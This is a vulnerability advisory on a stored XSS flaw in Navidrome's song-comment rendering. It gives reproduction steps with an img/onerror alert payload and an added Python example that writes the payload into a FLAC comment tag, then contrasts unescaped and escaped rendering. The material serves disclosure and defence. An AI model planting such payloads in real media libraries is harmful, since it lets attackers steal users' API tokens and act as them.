Navidrome Cross-Site Scripting Vulnerability Allowing Credential Exfiltration

Vulnerability

A cross-site scripting (XSS) vulnerability affects Navidrome versions prior to 0.60.0. The comment metadata of a song (for FLAC files, the Vorbis COMMENT tag) is read from the media file when the library is scanned and later rendered by the React-based web frontend without proper sanitization, so HTML or script embedded in the comment is interpreted by the browser instead of being displayed as text. Exploitation requires only that an audio file with a crafted comment reaches the library; the payload then runs in the browser of any user who views that song's information. Because the payload lives in stored metadata rather than in a request, this is a stored (persistent) XSS.

Impact

Injected scripts run in the context of the viewing user's session, so an attacker can read and exfiltrate sensitive data such as the Navidrome API token and then use it to act as that user against the server.

Reproduction

To reproduce, set the comment field of a song to a payload that exploits the flaw, for example an image tag whose 'onerror' event handler runs script (such as <img src=x onerror="alert(document.domain)">). The tag can be written with a tagging tool such as MusicBrainz Picard, or with metaflac's --set-tag option to place a COMMENT entry in a FLAC file's Vorbis comment metadata. Add the crafted file to the Navidrome library and let it be scanned. Then open 'Songs' or the song's album page, choose 'Get Info' from the menu, and the injected payload executes when the dialog renders the comment, confirming the XSS.
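The steps above, as an added example that is not Navidrome's code and does not come from the advisory: it models the reproduction offline in Python. It writes an XSS payload into a FLAC file's Vorbis COMMENT tag (the same edit metaflac --set-tag performs), reads the tag back the way a library scanner would, and then contrasts interpolating that comment into HTML unescaped, which is the class of flaw the Vulnerability section describes, with rendering it HTML-escaped. The payload, the tag values, the vendor string and the FLAC container bytes are all constructed here; no real media file or server is needed, and the rendering functions are a model of the frontend's behaviour, not Navidrome's React code.

```python
# Added example, not Navidrome's code and not from the advisory. Models the
# reproduction steps offline: write an XSS payload into a FLAC Vorbis COMMENT
# tag (what `metaflac --set-tag` does), read it back as a scanner would, and
# contrast rendering it as raw HTML with rendering it escaped.
import html
import re
import struct

FLAC_MAGIC = b"fLaC"
BLOCK_STREAMINFO = 0      # metadata block type 0, always first in the file
BLOCK_VORBIS_COMMENT = 4  # metadata block type 4, holds KEY=value tags

# Constructed payload of the kind the advisory describes; a real exfiltration
# handler would read the session's API token instead of calling alert().
XSS_COMMENT = '<img src=x onerror="alert(document.domain)">'

def block_header(block_type, length, last):
    # 4-byte header: last-flag bit | 7-bit type, then 24-bit big-endian length
    return bytes([(0x80 if last else 0x00) | block_type]) + length.to_bytes(3, "big")

def minimal_flac():
    # Constructed container: magic + all-zero 34-byte STREAMINFO, no audio frames
    return FLAC_MAGIC + block_header(BLOCK_STREAMINFO, 34, last=True) + bytes(34)

def read_blocks(data):
    # Returns ([(type, body), ...], trailing frame bytes)
    assert data[:4] == FLAC_MAGIC, "not a FLAC stream"
    blocks, pos, last = [], 4, False
    while not last:
        hdr = data[pos]
        last, btype = bool(hdr & 0x80), hdr & 0x7F
        length = int.from_bytes(data[pos + 1:pos + 4], "big")
        blocks.append((btype, data[pos + 4:pos + 4 + length]))
        pos += 4 + length
    return blocks, data[pos:]

def write_blocks(blocks, frames):
    out = bytearray(FLAC_MAGIC)
    for i, (btype, body) in enumerate(blocks):
        out += block_header(btype, len(body), last=(i == len(blocks) - 1)) + body
    return bytes(out) + frames

def build_vorbis_comment(tags, vendor=b"example-tagger"):
    # LE32 vendor length, vendor, LE32 entry count, LE32-length-prefixed KEY=value entries
    out = struct.pack("<I", len(vendor)) + vendor + struct.pack("<I", len(tags))
    for key, value in tags:
        entry = f"{key}={value}".encode("utf-8")
        out += struct.pack("<I", len(entry)) + entry
    return out

def parse_vorbis_comment(body):
    (vendor_len,) = struct.unpack_from("<I", body, 0)
    pos = 4 + vendor_len
    (count,) = struct.unpack_from("<I", body, pos)
    pos, tags = pos + 4, []
    for _ in range(count):
        (entry_len,) = struct.unpack_from("<I", body, pos)
        pos += 4
        key, _, value = body[pos:pos + entry_len].decode("utf-8").partition("=")
        tags.append((key.upper(), value))  # tag names are case-insensitive
        pos += entry_len
    return tags

def set_comment(flac_bytes, comment):
    # Replace COMMENT, keeping every other block and tag (metaflac --remove-tag + --set-tag)
    blocks, frames = read_blocks(flac_bytes)
    tags, kept = [], []
    for btype, body in blocks:
        if btype == BLOCK_VORBIS_COMMENT:
            tags = [t for t in parse_vorbis_comment(body) if t[0] != "COMMENT"]
        else:
            kept.append((btype, body))
    tags.append(("COMMENT", comment))
    kept.append((BLOCK_VORBIS_COMMENT, build_vorbis_comment(tags)))
    return write_blocks(kept, frames)

def get_comment(flac_bytes):
    # What a scanner would store for the song's comment field ('' if absent)
    for btype, body in read_blocks(flac_bytes)[0]:
        if btype == BLOCK_VORBIS_COMMENT:
            return dict(parse_vorbis_comment(body)).get("COMMENT", "")
    return ""

def render_comment_vulnerable(comment):
    # Unescaped interpolation: the browser parses the <img> and fires onerror
    return f'<div class="comment">{comment}</div>'

def render_comment_hardened(comment):
    # Escaped: the same bytes are shown as text and never parsed as markup
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'

def looks_like_markup(value):
    # Triage check for auditing an existing library: does a comment contain an HTML-style tag?
    return bool(re.search(r"<\s*/?\s*[A-Za-z][^>]*>", value))

if __name__ == "__main__":
    stored = get_comment(set_comment(minimal_flac(), XSS_COMMENT))
    print("stored :", stored)
    print("unsafe :", render_comment_vulnerable(stored))
    print("escaped:", render_comment_hardened(stored), "| flagged:", looks_like_markup(stored))
```

The hardened renderer is the principle behind the fix, not Navidrome's patch: a comment must reach the DOM as text (in React, as an ordinary string child rather than through dangerouslySetInnerHTML or any raw-HTML path). looks_like_markup is a coarse check for auditing a library that may already contain crafted files; it will flag harmless comments that happen to contain tag-like text, so treat a hit as a prompt to inspect, not as proof of abuse.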

Remediation

Users should update to Navidrome version 0.60.0 or later, where this vulnerability is patched. Because the payload is stored in the media files' metadata, upgrading removes the rendering flaw but not the crafted comments themselves; administrators who suspect abuse may want to check existing song comments for HTML markup.

Added: Feb 4, 2026, 10:21 PM
Updated: Feb 4, 2026, 10:21 PM

Vulnerability Rating

Custom Algorithm
spread: 0.8
impact: 2.9
exploitability: 4.6
remediation: 7.7
relevance: 2.5
threat: 4.8
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these eight key vulnerability categories, which are then combined to calculate the overall risk score.